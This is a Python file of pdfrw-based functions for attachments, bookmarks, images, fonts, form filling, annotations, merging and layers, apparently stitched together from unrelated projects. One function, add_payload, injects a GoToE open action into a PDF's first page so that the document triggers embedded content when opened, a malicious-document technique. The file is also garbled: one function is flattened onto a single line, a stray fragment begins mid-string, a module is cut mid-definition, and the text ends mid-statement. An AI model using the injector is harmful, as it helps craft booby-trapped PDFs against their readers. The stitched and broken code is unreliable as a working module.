def _create_compressed_file_object(source):
    """
    Create a file like object as ``/EmbeddedFile`` compressing it with deflate.

    The source is consumed in 4096-byte chunks; every chunk is fed to both an
    MD5 digest and a deflate compressor, so the whole input never has to be
    held uncompressed in memory.

    :param source:
        a binary file-like object; ``source.read(4096)`` must return ``b''``
        once the data is exhausted
    :return:
        the object representing the compressed file stream object, carrying
        ``/Params`` with the MD5 ``CheckSum`` and the uncompressed ``Size``
    """
    md5 = hashlib.md5()
    compress = zlib.compressobj()
    size = 0

    # Gather the compressed pieces and join them once at the end: growing
    # the stream with ``+=`` on every chunk re-copies the accumulated data
    # each time.
    compressed_parts = []
    for data in iter(lambda: source.read(4096), b''):
        size += len(data)
        md5.update(data)
        compressed_parts.append(compress.compress(data))
    compressed_parts.append(compress.flush(zlib.Z_FINISH))

    pdf_file_object = PdfDict(
        Type=PdfName('EmbeddedFile'), Filter=PdfName('FlateDecode'))
    # pdfrw needs Latin-1-decoded unicode strings in object.stream
    pdf_file_object.stream = b''.join(compressed_parts).decode('latin-1')
    pdf_file_object.Params = PdfDict(
        CheckSum=PdfString('<{}>'.format(md5.hexdigest())), Size=size)
    return pdf_file_object
def get_xml(string):
    """ Get XML soup from 'string'.

    ``string`` is expected to be bytes.  If it starts with ``<?xml`` it is
    parsed directly; otherwise it is treated as a PDF and the ``/Data``
    stream of its ``/Root`` is parsed.  Several legacy fallbacks are tried
    when that fails.

    :return: whatever ``new_xml`` returns for the extracted payload, or
        ``None`` when every attempt fails.
    """
    # NOTE: handlers catch ``Exception`` rather than using a bare ``except``
    # so that KeyboardInterrupt / SystemExit are never swallowed by this
    # best-effort parser.
    if string.startswith(b'<?xml'):
        try:
            return new_xml(string)
        except Exception:  # pragma: no cover
            return None
    try:
        reader = PdfReader(fdata=string)
        root = reader['/Root']
        msg = root.get(PdfName('Data'))
        return new_xml(msg.stream.encode('latin-1'))
    # these are legacy branches; I don't believe such files actually exist
    except Exception:  # pragma: no cover
        try:
            # Legacy: payload stored under /Metadata instead of /Data
            reader = PdfReader(fdata=string)
            root = reader['/Root']
            msg = root.get(PdfName('Metadata'))
            return new_xml(msg.stream.encode('latin-1'))
        except Exception:
            try:
                # Legacy: cut the text between 'stream' and 'endstream'
                return new_xml(
                    string.encode('latin-1').split('endstream')[0].split(
                        'stream')[1])
            except Exception:
                try:
                    # Last resort: hand over the whole input
                    return new_xml(string.encode('latin-1'))
                except Exception:
                    return None
def create_bookmarks(bookmarks, pages, parent=None):
    """Recursively turn a bookmark tree into linked PDF outline items.

    :param bookmarks: sequence of ``(label, target, children)`` triples;
        ``target[0]`` indexes ``pages`` and ``target[1]``/``target[2]`` are
        placed in the ``/XYZ`` destination; ``children`` has the same shape
        as ``bookmarks``.
    :param pages: indexable collection of page objects exposing
        ``.indirect``.
    :param parent: outline item to record as ``/Parent`` on every item of
        this level, or ``None``.
    :return: ``(items, count)`` where ``items`` is the list of outline items
        created for this level and ``count`` is the number of items at this
        level plus the counts reported by all nested levels.
    """
    total = len(bookmarks)
    outline_items = []
    for label, target, children in bookmarks:
        destination = (
            pages[target[0]].indirect,
            PdfName('XYZ'),
            target[1],
            target[2],
            0,
        )
        goto_action = PdfDict(
            Type=PdfName('Action'),
            S=PdfName('GoTo'),
            D=PdfArray(destination),
        )
        item = PdfDict(Title=PdfString.encode(label), A=goto_action)
        item.indirect = True

        child_items, child_total = create_bookmarks(
            children, pages, parent=item)
        item.Count = 1 + child_total

        # Chain this item to its preceding sibling, if there is one
        if outline_items:
            previous = outline_items[-1]
            item.Prev = previous
            previous.Next = item
        if child_items:
            item.First = child_items[0]
            item.Last = child_items[-1]
        if parent is not None:
            item.Parent = parent

        total += child_total
        outline_items.append(item)
    return outline_items, total
def make_image_xobject(image):
    """Construct a PdfDict representing the Image XObject, for inserting
    into the AP Resources dict.

    PNGs and GIFs are treated equally - the raw sample values are included
    using PDF's FlateDecode compression format. JPEGs can be included in
    their original form using the DCTDecode filter.

    PNGs with transparency have the alpha channel split out and included as
    an SMask, since PDFs don't natively support transparent PNGs.

    Details about file formats and allowed modes can be found at
    https://pillow.readthedocs.io/en/5.3.x/handbook/image-file-formats.html

    :param str|ImageFile image: Either a str representing the path to the
        image filename, or a PIL.ImageFile.ImageFile object representing
        the image loaded using the PIL library.
    :returns PdfDict: Image XObject
    :raises ValueError: if the image format is not PNG, GIF or JPEG
    """
    image = Image.resolve_image(image)
    # PILImage.convert drops the format attribute
    image_format = image.format
    width, height = image.size

    # Normalize images to RGB or grayscale color spaces, and split out the
    # alpha layer into a PDF smask XObject
    image, smask_xobj = Image.convert_to_compatible_image(
        image,
        image_format,
    )

    if image_format in ('PNG', 'GIF'):
        content = Image.make_compressed_image_content(image)
        filter_type = 'FlateDecode'  # TODO use a predictor
    elif image_format == 'JPEG':
        content = Image.make_jpeg_image_content(image)
        filter_type = 'DCTDecode'
    else:
        # Report the format captured before conversion: the converted image
        # may no longer carry a ``format`` attribute.
        raise ValueError(
            'Unsupported image format: {}. Supported formats are '
            'PNG, JPEG, and GIF'.format(image_format))

    xobj = PdfDict(
        stream=content,
        BitsPerComponent=8,
        Filter=PdfName(filter_type),
        ColorSpace=Image._get_color_space_name(image),
        Width=width,
        Height=height,
        Subtype=PdfName('Image'),
        Type=PdfName('XObject'),
    )
    if smask_xobj is not None:
        xobj.SMask = smask_xobj
    return xobj
def add_payload(name, output, path):
    """Copy the PDF ``name`` to ``output`` with an extra action on page one.

    The first page receives an ``/AA`` (additional actions) dictionary whose
    ``/O`` entry is a ``GoToE`` action with ``/F`` set to ``path`` and a
    ``/Fit`` destination on page index 0.  Progress is reported on stdout.

    :param name: path of the PDF to read.
    :param output: path the modified PDF is written to.
    :param path: value stored in the action's ``/F`` entry.
    """
    print('[*] Reading PDF file: %s' % name)
    reader = PdfReader(name)

    print('[*] Injecting the payload in the PDF file...')
    open_action = PdfDict(
        F=r'%s' % path,
        D=[0, PdfName('Fit')],
        S=PdfName('GoToE'),
    )
    first_page = reader.pages[0]
    first_page.AA = PdfDict(O=open_action)

    writer = PdfWriter()
    writer.addpages(reader.pages)

    print('[*] Saving modified PDF as: %s' % output)
    writer.write(output)
    print('[*] Done!')
def make_font_object():
    """Build the PDF Type1 font dictionary used by the annotation.

    The base font is always ``DEFAULT_BASE_FONT`` (the original notes that
    only Helvetica is supported) and the encoding is WinAnsiEncoding.

    :returns PdfDict: Resources PdfDict object, ready to be included in the
        Resources 'Font' subdictionary.
    """
    font_entries = {
        'Type': PdfName('Font'),
        'Subtype': PdfName('Type1'),
        'BaseFont': PdfName(DEFAULT_BASE_FONT),
        'Encoding': PdfName('WinAnsiEncoding'),
    }
    return PdfDict(**font_entries)
def get_png_smask(image):
    """Build a soft-mask Image XObject from the alpha channel of ``image``.

    The ``'A'`` channel is extracted, passed through
    ``Image.make_compressed_image_content`` and wrapped in an 8-bit
    DeviceGray image dictionary with the same dimensions as ``image``.

    :param image: image object exposing ``size`` and ``getchannel``.
    :returns PdfDict: indirect Image XObject holding the mask.
    """
    alpha_channel = image.getchannel('A')
    mask_width, mask_height = image.size
    mask_entries = {
        'stream': Image.make_compressed_image_content(alpha_channel),
        'Width': mask_width,
        'Height': mask_height,
        'BitsPerComponent': 8,
        'Filter': PdfName('FlateDecode'),
        'ColorSpace': PdfName('DeviceGray'),
        'Subtype': PdfName('Image'),
        'Type': PdfName('XObject'),
    }
    smask_xobj = PdfDict(**mask_entries)
    smask_xobj.indirect = True
    return smask_xobj
def _create_pdf_attachment(attachment, url_fetcher):
    """
    Create an attachment to the PDF stream

    :param attachment:
        an ``Attachment``, a ``(url, description)`` tuple, or any other value
        which is then handed to ``Attachment(guess=...)``
    :param url_fetcher:
        forwarded to ``Attachment`` whenever one has to be constructed here
    :return:
        the object representing the ``/Filespec`` object or :obj:`None` if
        the attachment couldn't be read.
    """
    try:
        if isinstance(attachment, Attachment):
            pass
        elif isinstance(attachment, tuple):
            # Attachments from document links like <link> or <a> can only be
            # URLs. They're passed in as tuples
            url, description = attachment
            attachment = Attachment(
                url=url, url_fetcher=url_fetcher, description=description)
        else:
            attachment = Attachment(guess=attachment, url_fetcher=url_fetcher)

        with attachment.source as (source_type, source, url, _):
            # Raw bytes are wrapped so they can be read like a file
            if isinstance(source, bytes):
                source = io.BytesIO(source)
            pdf_file_object = _create_compressed_file_object(source)
    except URLFetchingError as exc:
        LOGGER.error('Failed to load attachment: %s', exc)
        return None

    # TODO: Use the result object from a URL fetch operation to provide more
    # details on the possible filename
    filename = PdfString.encode(_get_filename_from_result(url, None))
    description_text = PdfString.encode(attachment.description or '')
    return PdfDict(
        Type=PdfName('Filespec'),
        F=PdfString.encode(''),
        UF=filename,
        EF=PdfDict(F=pdf_file_object),
        Desc=description_text,
    )
def get_form_fields_from_fdf(pdf_file_path):
    """Collect the AcroForm field values of a PDF into a ``PdfDict``.

    Fields whose ``/FT`` is ``/Sig`` and fields without a ``/T`` name are
    left out.  Each remaining field is stored under ``PdfName(<decoded T>)``
    with its ``/V`` value.

    :param pdf_file_path: path handed to ``PdfReader``.
    :return: the populated ``PdfDict``, or ``None`` (after printing a
        message) when the file cannot be parsed or exposes no form fields.
    """
    try:
        pdf_reader = PdfReader(pdf_file_path)
    except errors.PdfParseError:
        print(f"File '{pdf_file_path}' not found please specify full path")
        return None

    # Check if PDF has Form Fields and if we can read them
    try:
        pdf_form_fields = pdf_reader.Root.AcroForm.Fields
    except AttributeError:
        print(f"File '{pdf_file_path}' no Form Fields")
        return None

    # Field types that must not be transferred, e.g. signature fields
    ignore_fields = ('/Sig',)

    collected = PdfDict()
    for field in pdf_form_fields:
        if field.FT in ignore_fields:
            continue
        field_name = field.T
        if field_name is None:
            continue
        collected[PdfName(field_name.decode())] = field.V
    return collected
def fill_form(input_file, output_file, data):
    """Fill the form fields of a PDF and write the result.

    input_file can be file object or path name
    output_file can be file object or path name
    data is dictionary with keys corresponding to the form fields

    For every widget annotation whose field name (``/T`` with its first and
    last character stripped) is a key of ``data``:

    * ``None`` values are skipped and the widget is left untouched;
    * ``True`` sets ``/V`` to ``/On`` (checkbox);
    * anything else is written as its ``str`` form, together with an empty
      ``/AP`` so the value shows up in Apple Preview;
    * the widget's ``/Ff`` is set to 1 (read-only).

    Pages without annotations and widgets without a field name are ignored
    instead of raising.
    """
    the_pdf = PdfReader(input_file)
    for page in the_pdf.pages:
        # A page without any annotation has no /Annots entry at all
        annotations = page[ANNOT_KEY] or []
        for annotation in annotations:
            if annotation[SUBTYPE_KEY] != WIDGET_SUBTYPE_KEY:
                continue
            field_name = annotation[ANNOT_FIELD_KEY]
            if not field_name:
                # Widget without its own /T: nothing to match against
                continue
            key = field_name[1:-1]
            if key not in data:
                continue
            val = data[key]
            if val is None:
                # skip nulls
                continue
            if val is True:
                # treat booleans as checkboxes; identity test so that a
                # numeric 1 is still written as the text "1"
                annotation.update(PdfDict(V=PdfName("On")))
            else:
                # set annotation value
                annotation.update(PdfDict(V="{}".format(val)))
                # and empty appearance to make field visible in Apple Preview
                annotation.update(PdfDict(AP=""))
            # mark the fields as un-editable
            annotation.update(PdfDict(Ff=1))

    # set NeedAppearances to ensure the fields are visible in Adobe Reader
    if the_pdf.Root.AcroForm:
        the_pdf.Root.AcroForm.update(
            PdfDict(NeedAppearances=PdfObject("true")))

    PdfWriter().write(output_file, the_pdf)
def make_cid_font_object(tt_font):
    """Build the CIDFontType2 dictionary that serves as the descendant font
    of a composite Type 0 font.

    :param TrueTypeFont tt_font: Our utility class used to parse and
        calculate font metrics from a true type font.
    :returns PdfDict: CID Font Type 2 PdfDict object.
    """
    metrics = tt_font.metrics
    system_info = FreeText.make_cid_system_info_object()
    descriptor = FreeText.make_font_descriptor_object(tt_font)
    default_width = int(round(metrics.defaultWidth, 0))
    glyph_widths = PdfArray(metrics.widths)
    cid_to_gid = FreeText.make_cid_to_gid_map_object(tt_font)

    cid_font = {
        'Type': PdfName('Font'),
        'Subtype': PdfName('CIDFontType2'),
        'BaseFont': PdfName(tt_font.fontName),
        'CIDSystemInfo': system_info,
        'FontDescriptor': descriptor,
        'DW': default_width,
        'Widths': glyph_widths,
        'CIDToGIDMap': cid_to_gid,
    }
    return IndirectPdfDict(**cid_font)
def make_composite_font_object(font_file_path):
    """Build the Type0 composite font dictionary for a TrueType font file.

    The font is loaded with ``get_true_type_font`` and wrapped as a single
    CID descendant font using the ``Identity-H`` encoding.

    :param str font_file_path: The path and filename to the true type font
        we want to embed.
    :returns PdfDict: Resources PdfDict object, ready to be included in the
        Resources 'Font' subdictionary.
    """
    # TODO: Get font name from font program itself
    tt_font = get_true_type_font(font_file_path, DEFAULT_BASE_FONT)

    descendants = PdfArray([FreeText.make_cid_font_object(tt_font)])
    to_unicode = FreeText.make_to_unicode_object()

    composite_font = {
        'Type': PdfName('Font'),
        'Subtype': PdfName('Type0'),
        'BaseFont': PdfName(tt_font.fontName),
        'Encoding': PdfName('Identity-H'),
        'DescendantFonts': descendants,
        'ToUnicode': to_unicode,
    }
    return IndirectPdfDict(**composite_font)
def write_fillable_pdf(input_pdf_path, output_pdf_path, data_dict, camposCheckBox): template_pdf = PdfReader(input_pdf_path) #Necesario para que se vean cambios template_pdf.Root.AcroForm.update( PdfDict(NeedAppearances=PdfObject('true'))) #Por cada pagina del PDF for page in template_pdf.pages: annotations = page[ANNOT_KEY] #Para cada anotacion de la pagina for annotation in annotations: if annotation[SUBTYPE_KEY] == WIDGET_SUBTYPE_KEY: if annotation[ANNOT_FIELD_KEY]: key = annotation[ANNOT_FIELD_KEY][1:-1] if key in data_dict.keys(): #HACK PARA LOS CHECK. Si es true, se marcan, sino no if key in camposCheckBox: if (data_dict[key] == 'true'): annotation.update( PdfDict(V='{}'.format(data_dict[key]), AS=PdfName('Yes'))) #Si no se pone nada, por defecto no se marcan continue #Objeto necesario para que al rellenar se vean los campos rct = annotation.Rect hight = round(float(rct[3]) - float(rct[1]), 2) width = (round(float(rct[2]) - float(rct[0]), 2)) xobj = PdfDict( BBox=[0, 0, width, hight], FormType=1, Resources=PdfDict( ProcSet=[PdfName.PDF, PdfName.Text]), Subtype=PdfName.Form, Type=PdfName.XObject) #assign a stream to it xobj.stream = '''/Tx BMC BT /Helvetica 8.0 Tf 1.0 5.0 Td 0 g (''' + data_dict[key] + ''') Tj ET EMC''' #Actualizamos la anotacion en el PDF annotation.update( PdfDict(AP=PdfDict(N=xobj), V='{}'.format(data_dict[key]))) #Escribimos el PDF ya anotado al PATH de salida PdfWriter().write(output_pdf_path, template_pdf)
def make_font_descriptor_object(tt_font):
    """Build the FontDescriptor dictionary from the metrics of ``tt_font``.

    Ascent, descent, cap height, stem width and the default (missing) width
    are rounded to integers; the italic angle is truncated with ``int``.

    :param TrueTypeFont tt_font: Our utility class used to parse and
        calculate font metrics from a true type font.
    :returns PdfDict: Font Descriptor PdfDict object.
    """
    metrics = tt_font.metrics

    def rounded(value):
        # Whole-number form of a metric value
        return int(round(value, 0))

    descriptor = {
        'Type': PdfName('FontDescriptor'),
        'FontName': PdfName(tt_font.fontName),
        'Flags': metrics.flags,
        'FontBBox': metrics.bbox,
        'ItalicAngle': int(metrics.italicAngle),
        'Ascent': rounded(metrics.ascent),
        'Descent': rounded(metrics.descent),
        'CapHeight': rounded(metrics.capHeight),
        'StemV': rounded(metrics.stemV),
        'MissingWidth': rounded(metrics.defaultWidth),
        'FontFile2': FreeText.make_font_file_object(tt_font),
    }
    return IndirectPdfDict(**descriptor)
def create_highlight(points, color=(1, 0.92, 0.23), author=None,
                     contents=None):
    """Given quad points, create a highlight object in standard pdf format.

    :param points: iterable of ``(x1, y1, x2, y2)`` tuples, one per
        highlighted box.
    :param color: value stored as the annotation's ``/C`` entry.
    :param author: stored as ``/T`` when truthy.
    :param contents: stored as ``/Contents`` when truthy.
    :return: an indirect ``PdfDict`` of subtype ``/Highlight`` whose
        ``/QuadPoints`` lists every box and whose ``/Rect`` is the bounding
        box of all given coordinates (all zeros when ``points`` is empty).
    """
    new_highlight = PdfDict()
    new_highlight.F = 4
    new_highlight.Type = PdfName('Annot')
    new_highlight.Subtype = PdfName('Highlight')
    if author:
        new_highlight.T = author
    new_highlight.C = color
    if contents:
        new_highlight.Contents = contents
    new_highlight.indirect = True

    #############################################################
    ### Search for bounding coordinates
    #############################################################
    quad_pts = []
    xs = []
    ys = []
    for (x1, y1, x2, y2) in points:
        # this quadpoints specified PDF definition of rect box
        quad_pts.extend([x1, y2, x2, y2, x1, y1, x2, y1])
        xs.extend((x1, x2))
        ys.extend((y1, y2))

    if xs:
        # Take the extremes of the actual coordinates; seeding the maximum
        # with 0.0 would give a wrong box when every coordinate is negative.
        rect = [min(xs), min(ys), max(xs), max(ys)]
    else:
        # No boxes at all: emit a degenerate rectangle rather than infinities
        rect = [0.0, 0.0, 0.0, 0.0]

    new_highlight.QuadPoints = PdfArray(quad_pts)
    new_highlight.Rect = PdfArray(rect)
    return new_highlight
def apply_annotations(rmpage, page_annot, ocgorderinner):
    """Append one PDF annotation to ``rmpage`` per entry of ``page_annot``.

    ``page_annot`` is a sequence of layers; element ``[1]`` of each layer is
    the list of annotations.  Each annotation ``a`` supplies the subtype
    name in ``a[0]`` and four pixel coordinates in ``a[1]``..``a[4]``, which
    are scaled by ``PTPERPX``.  When ``ocgorderinner`` is truthy the
    annotation's ``/OC`` is set to the entry at the layer's index.
    """
    author = 'RCU'  # self.model.device_info['rcuname']
    for layer_index, layer in enumerate(page_annot):
        for a in layer[1]:
            # PDF origin is in bottom-left, so invert all
            # y-coordinates.
            rect = PdfArray([
                (a[1] * PTPERPX),
                PDFHEIGHT - (a[2] * PTPERPX),
                (a[3] * PTPERPX),
                PDFHEIGHT - (a[4] * PTPERPX),
            ])
            pdf_a = PdfDict(
                Type=PdfName('Annot'),
                Rect=rect,
                T=author,
                ANN='pdfmark',
                Subtype=PdfName(a[0]),
                P=rmpage,
            )
            # Set to indirect because it makes a cleaner PDF
            # output.
            pdf_a.indirect = True
            if ocgorderinner:
                pdf_a.OC = ocgorderinner[layer_index]
            # Create the page's annotation array on first use
            if '/Annots' not in rmpage:
                rmpage.Annots = PdfArray()
            rmpage.Annots.append(pdf_a)
def fix_metadata(doc, title=None, creation_date=None):
    """Overwrite the document information entries of ``doc``.

    The XMP ``/Metadata`` of the root is cleared, then ``Creator``,
    ``Keywords`` and ``ModDate`` (current time) are written to ``doc.Info``,
    plus ``Title`` and ``CreationDate`` when given.  Entries whose key does
    not contain ``'Date'`` are converted with ``PdfString.from_unicode``;
    date entries are stored as returned by ``make_pdf_date``.
    """
    # Clear any existing XMP meta data
    doc.Root.Metadata = None

    text_entries = [
        ('Creator', 'OffeneGesetze.de'),
        ('Keywords', 'Amtliches Werk nach §5 UrhG https://offenegesetze.de'),
    ]
    date_entries = [('ModDate', make_pdf_date(datetime.now()))]
    if title is not None:
        text_entries.append(('Title', title))
    if creation_date is not None:
        date_entries.append(('CreationDate', make_pdf_date(creation_date)))

    # Same insertion order as a single dict would give:
    # Creator, Keywords, ModDate, Title, CreationDate
    meta = dict(text_entries[:2] + date_entries[:1]
                + text_entries[2:] + date_entries[1:])

    for key, val in meta.items():
        is_date = 'Date' in key
        doc.Info[PdfName(key)] = val if is_date else PdfString.from_unicode(val)
def getPages(allpages, x, y, gap):
    """Combine the next ``x * y`` pages of ``allpages`` into one page.

    The consumed pages are removed from ``allpages`` in place.  Each page is
    turned into a form XObject and placed on an ``x`` by ``y`` grid, scaled
    by ``1/x - gap`` horizontally and ``1/y - gap`` vertically.

    :return: a ``PdfDict`` page whose content stream draws the XObjects
        ``/P0``, ``/P1``, ... and whose MediaBox spans the largest BBox
        width and height among the consumed pages.
    """
    # Number of pages to combine
    per_sheet = x * y

    # Pull pages off the list
    taken = allpages[:per_sheet]
    del allpages[:per_sheet]
    pages = [pagexobj(p) for p in taken]

    # Out page size
    width_max = max(page.BBox[2] for page in pages)
    height_max = max(page.BBox[3] for page in pages)

    scale_x = 1./x - gap
    scale_y = 1./y - gap

    commands = []
    xobjdict = PdfDict()
    row = y
    for position, page in enumerate(pages):
        offset_x = (position % x) * width_max / x
        # A zero horizontal offset starts a new row, one step further down
        if not offset_x:
            row = row - 1
        offset_y = row * height_max / y

        # Page number
        name = PdfName('P{}'.format(position))
        commands.append('q {x} 0 0 {y} {w} {h} cm {i} Do Q\n'.format(
            x=scale_x, y=scale_y, w=offset_x, h=offset_y, i=name))
        xobjdict[name] = page

    return PdfDict(
        Type=PdfName.Page,
        Contents=PdfDict(stream=''.join(commands)),
        MediaBox=PdfArray([-1000*gap, -1000*gap, width_max, height_max]),
        Resources=PdfDict(XObject=xobjdict),
    )
def concatenate(input_paths, output_path, details=None):
    """Concatenate pdf files, in order, into a single pdf with fresh metadata.

    The output always receives a new, empty Info dictionary; every entry of
    ``details`` is then stored in it under ``PdfName(key)``.

    Args:
        input_paths: A sequence of paths to pdf files.
        output_path: The desired path for the concatenated pdf.
        details: A dictionary of metadata values desired for the final pdf.
    """
    writer = PdfWriter()
    for path in input_paths:
        writer.addpages(PdfReader(path).pages)

    writer.trailer.Info = IndirectPdfDict()
    entries = details.items() if details is not None else ()
    for metadata, value in entries:
        writer.trailer.Info[PdfName(metadata)] = value

    writer.write(output_path)
def test_graphics_state(self):
    """A fully specified GraphicsState maps onto the ExtGState keys."""
    settings = dict(
        line_width=2,
        line_cap=constants.LINE_CAP_ROUND,
        line_join=constants.LINE_JOIN_MITER,
        miter_limit=1.404,
        dash_array=[[1], 0],
        stroke_transparency=0.7,
        fill_transparency=0.5,
    )
    pdf_dict = GraphicsState(**settings).as_pdf_dict()

    expected = PdfDict(
        Type=PdfName('ExtGState'),
        LW=2,
        LC=1,
        LJ=0,
        ML=1.404,
        D=[[1], 0],
        CA=0.7,
        ca=0.5,
    )
    assert pdf_dict == expected
1.0 5.0 Td 0 g (''' + data_dict[key] + ''') Tj ET EMC''' annotation.update( PdfDict(AP=PdfDict(N=xobj), V='{}'.format(data_dict[key]))) #annotation.update(pdfrw.PdfDict(V='{}'.format(data_dict[key]),AP='{}'.format(data_dict[key]))) PdfWriter().write(output_pdf_path, template_pdf) data_dict = { 'untitled1': '46017675', #Codigo de centro 'untitled5': 'IES La Sènia', #Nombre del centro 'untitled6': PdfName('Yes'), #Centro titularidad publica 'untitled2': 'Paiporta', #Localidad centro 'untitled4': 'Valencia', #Provincia centro 'untitled8': '961 20 59 55', #Telefono Centro 'untitled3': 'Calle Escultor José Capuz, 96', #Direccion Centro 'untitled9': '46200', #Codigo Postal Centro 'untitled10': 'NIA', #NIA Alumno 'untitled11': 'Curso', #Curso Alumno 'untitled12': 'Apellidos, Nombre', #Apellidos, Nombre - Alumnos 'untitled15': 'Desarrollo de Aplicaciones Web', #Titulo ciclo 'untitled16': 'Superior', #Grado ciclo 'untitled18': 'Punto 1.1', #Punto 1.1 'untitled17': 'Punto 1.2', #Punto 1.2 'untitled19': 'Punto 1.3', #Punto 1.3 'untitled20': 'Punto 1.4', #Punto 1.4 'untitled21': 'true', #Check Avanzado
def pdfdict(self):
    """Return a PageLabel entry to be inserted in the root of a PdfReader
    object.

    The labels contained in ``self`` are visited in sorted order and the
    objects yielded by each label's ``pdfobjs()`` are flattened into the
    ``/Nums`` array.
    """
    flattened = []
    for label in sorted(self):
        for obj in label.pdfobjs():
            flattened.append(obj)
    return PdfDict(Type=PdfName("Catalog"), Nums=PdfArray(flattened))
#!/usr/bin/env python3 from collections import namedtuple from pdfrw import PdfName, PdfDict, PdfObject, PdfString PageLabelTuple = namedtuple("PageLabelScheme", "startpage style prefix firstpagenum") defaults = {"style": "arabic", "prefix": '', "firstpagenum": 1} styles = { "arabic": PdfName('D'), "roman lowercase": PdfName('r'), "roman uppercase": PdfName('R'), "letters lowercase": PdfName('a'), "letters uppercase": PdfName('A') } stylecodes = {v: a for a, v in styles.items()} class PageLabelScheme(PageLabelTuple): """Represents a page numbering scheme. startpage : the index in the pdf (starting from 0) of the first page the scheme will be applied to. style : page numbering style (arabic, roman [lowercase|uppercase], letters [lowercase|uppercase]) prefix: a prefix to be prepended to all page labels firstpagenum : where to start numbering """ __slots__ = tuple() def __new__(cls, startpage, style=defaults["style"],
def join_files(input_files, output_file):
    """Concatenate PDFs and merge their AcroForm dictionaries.

    input_files is a list of file objects or path names
    output_file can be file object or path name

    The AcroForm of the first input that has one is adopted as the output
    AcroForm.  For every later input with an AcroForm, keys missing from the
    output are copied over, fonts missing from ``/DR /Font`` are added, and
    its ``/Fields`` are appended to the output's ``/Fields``.
    """
    # standard PdfWriter does not copy AcroForm objects
    # modified from https://stackoverflow.com/a/57687160
    root_key = PdfName("Root")
    acroform_key = PdfName("AcroForm")
    fields_key = PdfName("Fields")
    resources_key = PdfName("DR")
    font_dict_key = PdfName("Font")

    output = PdfWriter()
    output_acroform = None
    for pdf in input_files:
        reader = PdfReader(pdf, verbose=False)
        output.addpages(reader.pages)

        root = reader[root_key]
        if acroform_key not in root.keys():
            # Not all PDFs have an AcroForm node
            continue
        source_acroform = root[acroform_key]
        if fields_key in source_acroform:
            source_fields = source_acroform[fields_key]
        else:
            source_fields = []

        if output_acroform is None:
            # copy the first AcroForm node; its own fields are already in
            # place, so they must not be appended a second time
            output_acroform = source_acroform
            if fields_key not in output_acroform:
                output_acroform[fields_key] = source_fields
            continue

        # Add new AcroForms keys if output_acroform already existing
        for key in source_acroform.keys():
            if key not in output_acroform:
                output_acroform[key] = source_acroform[key]

        # Add missing font entries in /DR node of source file
        if (resources_key in source_acroform.keys()
                and font_dict_key in source_acroform[resources_key].keys()):
            source_fonts = source_acroform[resources_key][font_dict_key]
            output_resources = output_acroform[resources_key]
            if font_dict_key not in output_resources.keys():
                # if output_acroform is missing entirely the /Font node
                # under an existing /DR, simply add it
                output_resources[font_dict_key] = source_fonts
            else:
                # else add new fonts only
                output_fonts = output_resources[font_dict_key]
                for font_key in source_fonts.keys():
                    if font_key not in output_fonts:
                        output_fonts[font_key] = source_fonts[font_key]

        # Add new fields; iterate over a copy so the array can never be
        # extended with itself
        output_acroform[fields_key] += list(source_fields)

    output.trailer[root_key][acroform_key] = output_acroform
    output.write(output_file)
def do_apply_ocg(basepage, rmpage, i, uses_base_pdf, ocgprop, annotations):
    """Wrap the content of one page in optional content groups (OCGs).

    A 'Page N' OCG is always created.  With a base PDF, ``basepage``'s
    content stream becomes a 'Background' layer; without one, the leading
    part of ``rmpage``'s stream becomes a 'Template' layer.  Each further
    layer of ``rmpage`` (XObjects for bitmap output, marker-delimited
    sections for vector output) gets its own OCG named after
    ``annotations[i][l][0]``.

    :param basepage: page of the base PDF; only touched when
        ``uses_base_pdf`` is true.
    :param rmpage: generated page whose content stream and resources are
        rewritten in place.
    :param i: page index, used for the 'Page N' name and to index
        ``annotations``.
    :param uses_base_pdf: whether the document is layered over a base PDF.
    :param ocgprop: object whose ``OCGs`` list and ``D.Order`` list are
        appended to.
    :param annotations: per-page list of layers; element ``[0]`` of a layer
        is its name.
    :return: the ``PdfArray`` of OCGs created below the page OCG.
    """
    ocgpage = IndirectPdfDict(Type=PdfName('OCG'), Name='Page ' + str(i + 1))
    ocgprop.OCGs.append(ocgpage)

    # The Order dict is a Page, followed by Inner
    ocgorderinner = PdfArray()

    # Add Template OCG layer
    # If this uses a basepdf, the template is located
    # elsewhere.

    # If using a basepdf, assign its stream as a
    # 'Background' layer under this page. When the page
    # primary OCG is disabled, the background will
    # remain, making it easy to disable all annotations.
    if uses_base_pdf:
        ocgorigdoc = IndirectPdfDict(Type=PdfName('OCG'), Name='Background')
        ocgprop.OCGs.append(ocgorigdoc)
        ocgorderinner.append(ocgorigdoc)

        uncompress.uncompress([basepage.Contents])
        stream = basepage.Contents.stream
        stream = '/OC /ocgorigdoc BDC\n' \
            + stream \
            + 'EMC\n'
        basepage.Contents.stream = stream
        compress.compress([basepage.Contents])

        if '/Properties' in basepage.Resources:
            props = basepage.Resources.Properties
        else:
            props = PdfDict()
        props.ocgorigdoc = ocgorigdoc
        basepage.Resources.Properties = props

    # If not using a basepdf, assign the rmpage's stream
    # as a 'Template' layer under this page. It will be
    # affected by disabling the primary Page OCG (which
    # by itself is kind of useless for exported
    # notebooks).

    # Regardless of using a basepdf or not, put the
    # rmpage layers into their own OCGs.

    # If the template has an XObject, we want to skip
    # the first one. This happens when the template
    # contains a PNG. Question--what happens when the
    # template contains more than one PNG? How do we
    # detect all of those?

    template_xobj_keys = []
    vector_layers = []
    uncompress.uncompress([rmpage.Contents])
    if uses_base_pdf:
        # The entire thing is the page ocg
        stream = '/OC /ocgpage BDC\n'
        stream += rmpage.Contents.stream
        stream += 'EMC\n'
        rmpage.Contents.stream = stream
    else:
        stream = rmpage.Contents.stream
        # Mark the template ocg separate from page ocg
        template_endpos = 0
        page_inatpos = 0
        findkey = '1 w 2 J 2 j []0 d\nq\n'
        # Finds only the first instance, which should be
        # for the template.
        findloc = stream.find(findkey)
        if findloc < 0:
            # May be a vector, which we stick a marker
            # in for.
            # ?? Why is this a half-point off ??
            findkey = '799.500000 85 l\n'
            m = re.search(findkey, rmpage.Contents.stream)
            if m:
                findloc = m.start()
        if findloc > 0:
            template_endpos = findloc + len(findkey)
            # Add vector template OCG
            stream = '/OC /ocgtemplate BDC\n'
            stream += rmpage.Contents.stream[:template_endpos]
            stream += 'EMC\n'
            page_inatpos = len(stream)
            stream += rmpage.Contents.stream[template_endpos:]
            # Save stream
            rmpage.Contents.stream = stream

        # Add template ocg
        ocgtemplate = IndirectPdfDict(Type=PdfName('OCG'), Name='Template')
        ocgprop.OCGs.append(ocgtemplate)
        ocgorderinner.append(ocgtemplate)

        # If a template (which is SVG) has embedded PNG
        # images, those appear as XObjects. This will
        # mess up the layer order, so we will ignore
        # them later.
        template_xobj_keys = \
